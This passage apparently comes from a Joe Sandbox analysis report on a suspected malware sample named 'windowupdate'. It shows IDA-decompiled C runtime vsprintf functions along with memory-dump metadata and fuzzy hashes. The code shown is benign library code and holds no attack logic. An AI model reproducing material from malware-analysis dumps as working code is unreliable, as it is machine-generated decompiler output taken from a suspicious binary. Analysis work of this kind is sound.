                      													_v1184 = _v1124;
                      													E00D67110( &_v1120);
                      													E00D67230( &_v1224);
                      													_t147 = _v1184;
                      													goto L48;
                      												}
                      												_t221 = 0;
                      												 *((short*)(_a12 + _a16 * 2 - 2)) = 0;
                      												_v1180 = 0xfffffffe;
                      												E00D67110( &_v1120);
                      												E00D67230( &_v1224);
                      												_t147 = _v1180;
                      												goto L48;
                      											}
                      											_v1176 = 0xffffffff;
                      											E00D67110( &_v1120);
                      											E00D67230( &_v1224);
                      											_t147 = _v1176;
                      											goto L48;
                      										}
                      										__eflags = _a16;
                      										if(_a16 != 0) {
                      											__eflags = _v1124;
                      											if(_v1124 >= 0) {
                      												__eflags = _v1132 - _a16;
                      												if(_v1132 != _a16) {
                      													__eflags = 0;
                      													 *((short*)(_a12 + _v1132 * 2)) = 0;
                      												} else {
                      													 *((short*)(_a12 + _a16 * 2 - 2)) = 0;
                      												}
                      											} else {
                      												 *_a12 = 0;
                      											}
                      										}
                      										goto L47;
                      									}
                      									__eflags = _a16;
                      									if(_a16 != 0) {
                      										L27:
                      										__eflags = _v1132 - _a16;
                      										if(_v1132 == _a16) {
                      											__eflags = _v1124;
                      											if(_v1124 < 0) {
                      												L32:
                      												goto L47;
                      											}
                      											__eflags = _v1124 - _a16;
                      											if(_v1124 <= _a16) {
                      												goto L32;
                      											}
                      											_v1172 = 0xffffffff;
                      											E00D67110( &_v1120);
                      											E00D67230( &_v1224);
                      											_t147 = _v1172;
                      											goto L48;
                      										}
                      										 *((short*)(_a12 + _v1132 * 2)) = 0;
                      										goto L32;
                      									}
                      									__eflags = _v1124;
                      									if(_v1124 == 0) {
                      										goto L27;
                      									}
                      									_v1168 = 0xffffffff;
                      									E00D67110( &_v1120);
                      									E00D67230( &_v1224);
                      									_t147 = _v1168;
                      									goto L48;
                      								}
                      								_t221 = _v1124;
                      								_v1164 = _v1124;
                      								E00D67110( &_v1120);
                      								E00D67230( &_v1224);
                      								_t147 = _v1164;
                      								goto L48;
                      							}
                      							__eflags = _a12;
                      							if(_a12 == 0) {
                      								goto L20;
                      							}
                      							_v1160 = 0;
                      							goto L21;
                      						} else {
                      							 *((intOrPtr*)(L00D82F70(_t173))) = 0x16;
                      							_t147 = E00D82900(L"buffer_count == 0 || buffer != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0) | 0xffffffff;
                      							L48:
                      							return E00D47280(_t147, _t172, _v8 ^ _t230, _t221, _t228, _t229);
                      						}
                      					}
                      					__eflags = _a12;
                      					if(_a12 != 0) {
                      						goto L11;
                      					}
                      					_v1152 = 0;
                      					goto L12;
                      				}
                      				 *((intOrPtr*)(L00D82F70(_t173))) = 0x16;
                      				_t147 = E00D82900(L"format != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0) | 0xffffffff;
                      				goto L48;
                      			}

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D5E879
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                      • API String ID: 4219598475-3439959449
                      • Opcode ID: fe04aae733b97aacc072c48ee538e306bab3202a1b08be33f8004fd501c48fc2
                      • Instruction ID: b32c81c61701ec242c647d1ce6ba1af45abb26b92e1eebfb7fc63e7c6769844b
                      • Opcode Fuzzy Hash: fe04aae733b97aacc072c48ee538e306bab3202a1b08be33f8004fd501c48fc2
                      • Instruction Fuzzy Hash: 71C138B09042198BDF28EF14CC92BAAB3B4FF54305F1041D9EA4967291DB709E88CF79
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E00D5DE00(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                      				signed int _v8;
                      				char _v2744;
                      				signed int _v2748;
                      				char _v2752;
                      				signed int _v2756;
                      				signed int _v2760;
                      				char _v2764;
                      				char _v2768;
                      				intOrPtr _v2772;
                      				signed int _v2776;
                      				signed int _v2780;
                      				char _v2784;
                      				signed int _v2788;
                      				signed int _v2792;
                      				signed int _v2796;
                      				signed int _v2800;
                      				signed int _v2804;
                      				signed int _v2808;
                      				signed int _v2812;
                      				signed int _v2816;
                      				signed int _v2820;
                      				signed int _v2824;
                      				signed int _v2828;
                      				signed int _v2832;
                      				char _v2848;
                      				char _v2852;
                      				signed int _t127;
                      				void* _t135;
                      				signed int _t147;
                      				void* _t168;
                      				void* _t171;
                      				void* _t172;
                      				void* _t173;
                      				void* _t228;
                      				void* _t229;
                      				signed int _t230;
                      				void* _t231;
                      
                      				_t229 = __esi;
                      				_t228 = __edi;
                      				_t173 = __ecx;
                      				_t172 = __ebx;
                      				_t127 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t127 ^ _t230;
                      				if(_a20 == 0) {
                      					_v2768 = 0;
                      				} else {
                      					_v2768 = 1;
                      				}
                      				_v2772 = _v2768;
                      				_t235 = _v2772;
                      				if(_v2772 == 0) {
                      					_t171 = L00D84930(_t235, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0, L"%ls", L"format != nullptr");
                      					_t231 = _t231 + 0x18;
                      					if(_t171 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v2772 != 0) {
                      					__eflags = _a16;
                      					if(_a16 == 0) {
                      						L11:
                      						_v2776 = 1;
                      						L12:
                      						_v2780 = _v2776;
                      						__eflags = _v2780;
                      						if(__eflags == 0) {
                      							_t168 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0, L"%ls", L"buffer_count == 0 || buffer != nullptr");
                      							_t231 = _t231 + 0x18;
                      							__eflags = _t168 - 1;
                      							if(_t168 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v2780;
                      						if(_v2780 != 0) {
                      							L00D66CC0(_t172,  &_v2848, _t229, _a24);
                      							_v2764 = 0;
                      							_v2760 = 0;
                      							_v2756 = 0;
                      							_v2752 = 0;
                      							_v2764 = _a12;
                      							_v2760 = _a16;
                      							_v2756 = 0;
                      							_v2816 = _a4 & 0x00000002;
                      							_v2812 = _a8 & 0x00000000;
                      							__eflags = _v2816 | _v2812;
                      							if((_v2816 | _v2812) != 0) {
                      								L20:
                      								_v2784 = 1;
                      								L21:
                      								_v2752 = _v2784;
                      								_t135 = E00D67A60( &_v2848);
                      								E00D66BE0( &_v2744, E00D66CA0( &_v2852,  &_v2764), _a4, _a8, _a20, _t135, _a28);
                      								_v2748 = E00D6BB20(_t172,  &_v2744, _t228, _t229);
                      								__eflags = _a12;
                      								if(_a12 != 0) {
                      									_v2824 = _a4 & 0x00000001;
                      									_v2820 = _a8 & 0x00000000;
                      									__eflags = _v2824 | _v2820;
                      									if((_v2824 | _v2820) == 0) {
                      										_t221 = _a4 & 0x00000002;
                      										_v2832 = _a4 & 0x00000002;
                      										_v2828 = _a8 & 0x00000000;
                      										__eflags = _v2832 | _v2828;
                      										if((_v2832 | _v2828) == 0) {
                      											__eflags = _a16;
                      											if(_a16 != 0) {
                      												__eflags = _v2756 - _a16;
                      												if(_v2756 != _a16) {
                      													__eflags = 0;
                      													 *((short*)(_a12 + _v2756 * 2)) = 0;
                      													L47:
                      													_t221 = _v2748;
                      													_v2808 = _v2748;
                      													E00D670F0( &_v2744);
                      													E00D67230( &_v2848);
                      													_t147 = _v2808;
                      													goto L48;
                      												}
                      												_t221 = 0;
                      												 *((short*)(_a12 + _a16 * 2 - 2)) = 0;
                      												_v2804 = 0xfffffffe;
                      												E00D670F0( &_v2744);
                      												E00D67230( &_v2848);
                      												_t147 = _v2804;
                      												goto L48;
                      											}
                      											_v2800 = 0xffffffff;
                      											E00D670F0( &_v2744);
                      											E00D67230( &_v2848);
                      											_t147 = _v2800;
                      											goto L48;
                      										}
                      										__eflags = _a16;
                      										if(_a16 != 0) {
                      											__eflags = _v2748;
                      											if(_v2748 >= 0) {
                      												__eflags = _v2756 - _a16;
                      												if(_v2756 != _a16) {
                      													__eflags = 0;
                      													 *((short*)(_a12 + _v2756 * 2)) = 0;
                      												} else {
                      													 *((short*)(_a12 + _a16 * 2 - 2)) = 0;
                      												}
                      											} else {
                      												 *_a12 = 0;
                      											}
                      										}
                      										goto L47;
                      									}
                      									__eflags = _a16;
                      									if(_a16 != 0) {
                      										L27:
                      										__eflags = _v2756 - _a16;
                      										if(_v2756 == _a16) {
                      											__eflags = _v2748;
                      											if(_v2748 < 0) {
                      												L32:
                      												goto L47;
                      											}
                      											__eflags = _v2748 - _a16;
                      											if(_v2748 <= _a16) {
                      												goto L32;
                      											}
                      											_v2796 = 0xffffffff;
                      											E00D670F0( &_v2744);
                      											E00D67230( &_v2848);
                      											_t147 = _v2796;
                      											goto L48;
                      										}
                      										 *((short*)(_a12 + _v2756 * 2)) = 0;
                      										goto L32;
                      									}
                      									__eflags = _v2748;
                      									if(_v2748 == 0) {
                      										goto L27;
                      									}
                      									_v2792 = 0xffffffff;
                      									E00D670F0( &_v2744);
                      									E00D67230( &_v2848);
                      									_t147 = _v2792;
                      									goto L48;
                      								}
                      								_t221 = _v2748;
                      								_v2788 = _v2748;
                      								E00D670F0( &_v2744);
                      								E00D67230( &_v2848);
                      								_t147 = _v2788;
                      								goto L48;
                      							}
                      							__eflags = _a12;
                      							if(_a12 == 0) {
                      								goto L20;
                      							}
                      							_v2784 = 0;
                      							goto L21;
                      						} else {
                      							 *((intOrPtr*)(L00D82F70(_t173))) = 0x16;
                      							_t147 = E00D82900(L"buffer_count == 0 || buffer != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0) | 0xffffffff;
                      							L48:
                      							return E00D47280(_t147, _t172, _v8 ^ _t230, _t221, _t228, _t229);
                      						}
                      					}
                      					__eflags = _a12;
                      					if(_a12 != 0) {
                      						goto L11;
                      					}
                      					_v2776 = 0;
                      					goto L12;
                      				}
                      				 *((intOrPtr*)(L00D82F70(_t173))) = 0x16;
                      				_t147 = E00D82900(L"format != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0) | 0xffffffff;
                      				goto L48;
                      			}

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D5DFF9
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                      • API String ID: 4219598475-3439959449
                      • Opcode ID: ce79cc1399f980d605c6797440dec6f49353a9d78d376b91a4c3d25c6c8d744e
                      • Instruction ID: 1314a5e1ba1d2ac6643e6015cbefe9e95f18ba7ed0bc8cb658dae2ef0336835f
                      • Opcode Fuzzy Hash: ce79cc1399f980d605c6797440dec6f49353a9d78d376b91a4c3d25c6c8d744e
                      • Instruction Fuzzy Hash: B2C13870A043198BDF24EF14C852FAAB7B1BF15319F1441D9E81AA7681DB709E89CF72
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E00D5D150(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                      				signed int _v8;
                      				char _v1120;
                      				signed int _v1124;
                      				char _v1128;
                      				char _v1132;
                      				signed int _v1136;
                      				char _v1140;
                      				char _v1144;
                      				intOrPtr _v1148;
                      				signed int _v1152;
                      				signed int _v1156;
                      				char _v1160;
                      				signed int _v1164;
                      				signed int _v1168;
                      				signed int _v1172;
                      				signed int _v1176;
                      				signed int _v1180;
                      				signed int _v1184;
                      				signed int _v1188;
                      				signed int _v1192;
                      				signed int _v1196;
                      				signed int _v1200;
                      				signed int _v1204;
                      				signed int _v1208;
                      				char _v1224;
                      				char _v1228;
                      				signed int _t117;
                      				void* _t125;
                      				signed int _t138;
                      				void* _t155;
                      				void* _t158;
                      				void* _t159;
                      				void* _t160;
                      				void* _t210;
                      				void* _t211;
                      				signed int _t212;
                      				void* _t213;
                      
                      				_t211 = __esi;
                      				_t210 = __edi;
                      				_t160 = __ecx;
                      				_t159 = __ebx;
                      				_t117 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t117 ^ _t212;
                      				if(_a20 == 0) {
                      					_v1144 = 0;
                      				} else {
                      					_v1144 = 1;
                      				}
                      				_v1148 = _v1144;
                      				_t217 = _v1148;
                      				if(_v1148 == 0) {
                      					_t158 = L00D84930(_t217, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0, L"%ls", L"format != nullptr");
                      					_t213 = _t213 + 0x18;
                      					if(_t158 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v1148 != 0) {
                      					__eflags = _a16;
                      					if(_a16 == 0) {
                      						L11:
                      						_v1152 = 1;
                      						L12:
                      						_v1156 = _v1152;
                      						__eflags = _v1156;
                      						if(__eflags == 0) {
                      							_t155 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0, L"%ls", L"buffer_count == 0 || buffer != nullptr");
                      							_t213 = _t213 + 0x18;
                      							__eflags = _t155 - 1;
                      							if(_t155 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v1156;
                      						if(_v1156 != 0) {
                      							L00D66CC0(_t159,  &_v1224, _t211, _a24);
                      							_v1140 = 0;
                      							_v1136 = 0;
                      							_v1132 = 0;
                      							_v1128 = 0;
                      							_v1140 = _a12;
                      							_v1136 = _a16;
                      							_v1132 = 0;
                      							_v1192 = _a4 & 0x00000002;
                      							_v1188 = _a8 & 0x00000000;
                      							__eflags = _v1192 | _v1188;
                      							if((_v1192 | _v1188) != 0) {
                      								L20:
                      								_v1160 = 1;
                      								L21:
                      								_v1128 = _v1160;
                      								_t125 = E00D67A60( &_v1224);
                      								E00D66A90( &_v1120, E00D66C80( &_v1228,  &_v1140), _a4, _a8, _a20, _t125, _a28);
                      								_v1124 = E00D6A850( &_v1120);
                      								__eflags = _a12;
                      								if(_a12 != 0) {
                      									_v1200 = _a4 & 0x00000001;
                      									_v1196 = _a8 & 0x00000000;
                      									__eflags = _v1200 | _v1196;
                      									if((_v1200 | _v1196) == 0) {
                      										_v1208 = _a4 & 0x00000002;
                      										_v1204 = _a8 & 0x00000000;
                      										_t207 = _v1208 | _v1204;
                      										__eflags = _v1208 | _v1204;
                      										if((_v1208 | _v1204) == 0) {
                      											__eflags = _a16;
                      											if(_a16 != 0) {
                      												__eflags = _v1132 - _a16;
                      												if(_v1132 != _a16) {
                      													_t207 = _a12 + _v1132;
                      													__eflags = _t207;
                      													 *_t207 = 0;
                      													L47:
                      													_v1184 = _v1124;
                      													E00D67010( &_v1120);
                      													E00D67230( &_v1224);
                      													_t138 = _v1184;
                      													goto L48;
                      												}
                      												 *((char*)(_a12 + _a16 - 1)) = 0;
                      												_v1180 = 0xfffffffe;
                      												E00D67010( &_v1120);
                      												E00D67230( &_v1224);
                      												_t138 = _v1180;
                      												goto L48;
                      											}
                      											_v1176 = 0xffffffff;
                      											E00D67010( &_v1120);
                      											E00D67230( &_v1224);
                      											_t138 = _v1176;
                      											goto L48;
                      										}
                      										__eflags = _a16;
                      										if(_a16 != 0) {
                      											__eflags = _v1124;
                      											if(_v1124 >= 0) {
                      												__eflags = _v1132 - _a16;
                      												if(_v1132 != _a16) {
                      													_t207 = _a12 + _v1132;
                      													__eflags = _t207;
                      													 *_t207 = 0;
                      												} else {
                      													 *((char*)(_a12 + _a16 - 1)) = 0;
                      												}
                      											} else {
                      												_t207 = _a12;
                      												 *_a12 = 0;
                      											}
                      										}
                      										goto L47;
                      									}
                      									__eflags = _a16;
                      									if(_a16 != 0) {
                      										L27:
                      										__eflags = _v1132 - _a16;
                      										if(_v1132 == _a16) {
                      											__eflags = _v1124;
                      											if(_v1124 < 0) {
                      												L32:
                      												goto L47;
                      											}
                      											_t207 = _v1124;
                      											__eflags = _v1124 - _a16;
                      											if(_v1124 <= _a16) {
                      												goto L32;
                      											}
                      											_v1172 = 0xffffffff;
                      											E00D67010( &_v1120);
                      											E00D67230( &_v1224);
                      											_t138 = _v1172;
                      											goto L48;
                      										}
                      										 *(_a12 + _v1132) = 0;
                      										goto L32;
                      									}
                      									__eflags = _v1124;
                      									if(_v1124 == 0) {
                      										goto L27;
                      									}
                      									_v1168 = 0xffffffff;
                      									E00D67010( &_v1120);
                      									E00D67230( &_v1224);
                      									_t138 = _v1168;
                      									goto L48;
                      								}
                      								_t207 = _v1124;
                      								_v1164 = _v1124;
                      								E00D67010( &_v1120);
                      								E00D67230( &_v1224);
                      								_t138 = _v1164;
                      								goto L48;
                      							}
                      							__eflags = _a12;
                      							if(_a12 == 0) {
                      								goto L20;
                      							}
                      							_v1160 = 0;
                      							goto L21;
                      						} else {
                      							 *((intOrPtr*)(L00D82F70(_t160))) = 0x16;
                      							_t138 = E00D82900(L"buffer_count == 0 || buffer != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0) | 0xffffffff;
                      							L48:
                      							return E00D47280(_t138, _t159, _v8 ^ _t212, _t207, _t210, _t211);
                      						}
                      					}
                      					__eflags = _a12;
                      					if(_a12 != 0) {
                      						goto L11;
                      					}
                      					_v1152 = 0;
                      					goto L12;
                      				}
                      				 *((intOrPtr*)(L00D82F70(_t160))) = 0x16;
                      				_t138 = E00D82900(L"format != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0) | 0xffffffff;
                      				goto L48;
                      			}

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D5D349
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                      • API String ID: 4219598475-3439959449
                      • Opcode ID: 9be546fd1aa882780f4f28a2cba452dfcf1d440ed559f095d963645171124621
                      • Instruction ID: d09294e7ce11d3604a7cfbdef5c10bd225b350f88194940bfff4ec7b7b7ac745
                      • Opcode Fuzzy Hash: 9be546fd1aa882780f4f28a2cba452dfcf1d440ed559f095d963645171124621
                      • Instruction Fuzzy Hash: FAC13AB09052198FDF34DF14CC91BAAB7B1AB41319F1441D8EA4967281DB70AE88CF7A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E00D5E250(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                      				signed int _v8;
                      				char _v1120;
                      				signed int _v1124;
                      				char _v1128;
                      				char _v1132;
                      				signed int _v1136;
                      				char _v1140;
                      				char _v1144;
                      				intOrPtr _v1148;
                      				signed int _v1152;
                      				signed int _v1156;
                      				char _v1160;
                      				signed int _v1164;
                      				signed int _v1168;
                      				signed int _v1172;
                      				signed int _v1176;
                      				signed int _v1180;
                      				signed int _v1184;
                      				signed int _v1188;
                      				signed int _v1192;
                      				signed int _v1196;
                      				signed int _v1200;
                      				signed int _v1204;
                      				signed int _v1208;
                      				char _v1224;
                      				char _v1228;
                      				signed int _t117;
                      				void* _t125;
                      				signed int _t138;
                      				void* _t155;
                      				void* _t158;
                      				void* _t159;
                      				void* _t160;
                      				void* _t210;
                      				void* _t211;
                      				signed int _t212;
                      				void* _t213;
                      
                      				_t211 = __esi;
                      				_t210 = __edi;
                      				_t160 = __ecx;
                      				_t159 = __ebx;
                      				_t117 =  *0xdf600c; // 0x71e60372
                      				_v8 = _t117 ^ _t212;
                      				if(_a20 == 0) {
                      					_v1144 = 0;
                      				} else {
                      					_v1144 = 1;
                      				}
                      				_v1148 = _v1144;
                      				_t217 = _v1148;
                      				if(_v1148 == 0) {
                      					_t158 = L00D84930(_t217, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0, L"%ls", L"format != nullptr");
                      					_t213 = _t213 + 0x18;
                      					if(_t158 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				if(_v1148 != 0) {
                      					__eflags = _a16;
                      					if(_a16 == 0) {
                      						L11:
                      						_v1152 = 1;
                      						L12:
                      						_v1156 = _v1152;
                      						__eflags = _v1156;
                      						if(__eflags == 0) {
                      							_t155 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0, L"%ls", L"buffer_count == 0 || buffer != nullptr");
                      							_t213 = _t213 + 0x18;
                      							__eflags = _t155 - 1;
                      							if(_t155 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v1156;
                      						if(_v1156 != 0) {
                      							L00D66CC0(_t159,  &_v1224, _t211, _a24);
                      							_v1140 = 0;
                      							_v1136 = 0;
                      							_v1132 = 0;
                      							_v1128 = 0;
                      							_v1140 = _a12;
                      							_v1136 = _a16;
                      							_v1132 = 0;
                      							_v1192 = _a4 & 0x00000002;
                      							_v1188 = _a8 & 0x00000000;
                      							__eflags = _v1192 | _v1188;
                      							if((_v1192 | _v1188) != 0) {
                      								L20:
                      								_v1160 = 1;
                      								L21:
                      								_v1128 = _v1160;
                      								_t125 = E00D67A60( &_v1224);
                      								E00D66AF0( &_v1120, E00D66C80( &_v1228,  &_v1140), _a4, _a8, _a20, _t125, _a28);
                      								_v1124 = E00D6ADB0( &_v1120);
                      								__eflags = _a12;
                      								if(_a12 != 0) {
                      									_v1200 = _a4 & 0x00000001;
                      									_v1196 = _a8 & 0x00000000;
                      									__eflags = _v1200 | _v1196;
                      									if((_v1200 | _v1196) == 0) {
                      										_v1208 = _a4 & 0x00000002;
                      										_v1204 = _a8 & 0x00000000;
                      										_t207 = _v1208 | _v1204;
                      										__eflags = _v1208 | _v1204;
                      										if((_v1208 | _v1204) == 0) {
                      											__eflags = _a16;
                      											if(_a16 != 0) {
                      												__eflags = _v1132 - _a16;
                      												if(_v1132 != _a16) {
                      													_t207 = _a12 + _v1132;
                      													__eflags = _t207;
                      													 *_t207 = 0;
                      													L47:
                      													_v1184 = _v1124;
                      													E00D67050( &_v1120);
                      													E00D67230( &_v1224);
                      													_t138 = _v1184;
                      													goto L48;
                      												}
                      												 *((char*)(_a12 + _a16 - 1)) = 0;
                      												_v1180 = 0xfffffffe;
                      												E00D67050( &_v1120);
                      												E00D67230( &_v1224);
                      												_t138 = _v1180;
                      												goto L48;
                      											}
                      											_v1176 = 0xffffffff;
                      											E00D67050( &_v1120);
                      											E00D67230( &_v1224);
                      											_t138 = _v1176;
                      											goto L48;
                      										}
                      										__eflags = _a16;
                      										if(_a16 != 0) {
                      											__eflags = _v1124;
                      											if(_v1124 >= 0) {
                      												__eflags = _v1132 - _a16;
                      												if(_v1132 != _a16) {
                      													_t207 = _a12 + _v1132;
                      													__eflags = _t207;
                      													 *_t207 = 0;
                      												} else {
                      													 *((char*)(_a12 + _a16 - 1)) = 0;
                      												}
                      											} else {
                      												_t207 = _a12;
                      												 *_a12 = 0;
                      											}
                      										}
                      										goto L47;
                      									}
                      									__eflags = _a16;
                      									if(_a16 != 0) {
                      										L27:
                      										__eflags = _v1132 - _a16;
                      										if(_v1132 == _a16) {
                      											__eflags = _v1124;
                      											if(_v1124 < 0) {
                      												L32:
                      												goto L47;
                      											}
                      											_t207 = _v1124;
                      											__eflags = _v1124 - _a16;
                      											if(_v1124 <= _a16) {
                      												goto L32;
                      											}
                      											_v1172 = 0xffffffff;
                      											E00D67050( &_v1120);
                      											E00D67230( &_v1224);
                      											_t138 = _v1172;
                      											goto L48;
                      										}
                      										 *(_a12 + _v1132) = 0;
                      										goto L32;
                      									}
                      									__eflags = _v1124;
                      									if(_v1124 == 0) {
                      										goto L27;
                      									}
                      									_v1168 = 0xffffffff;
                      									E00D67050( &_v1120);
                      									E00D67230( &_v1224);
                      									_t138 = _v1168;
                      									goto L48;
                      								}
                      								_t207 = _v1124;
                      								_v1164 = _v1124;
                      								E00D67050( &_v1120);
                      								E00D67230( &_v1224);
                      								_t138 = _v1164;
                      								goto L48;
                      							}
                      							__eflags = _a12;
                      							if(_a12 == 0) {
                      								goto L20;
                      							}
                      							_v1160 = 0;
                      							goto L21;
                      						} else {
                      							 *((intOrPtr*)(L00D82F70(_t160))) = 0x16;
                      							_t138 = E00D82900(L"buffer_count == 0 || buffer != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0) | 0xffffffff;
                      							L48:
                      							return E00D47280(_t138, _t159, _v8 ^ _t212, _t207, _t210, _t211);
                      						}
                      					}
                      					__eflags = _a12;
                      					if(_a12 != 0) {
                      						goto L11;
                      					}
                      					_v1152 = 0;
                      					goto L12;
                      				}
                      				 *((intOrPtr*)(L00D82F70(_t160))) = 0x16;
                      				_t138 = E00D82900(L"format != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0) | 0xffffffff;
                      				goto L48;
                      			}

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D5E449
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
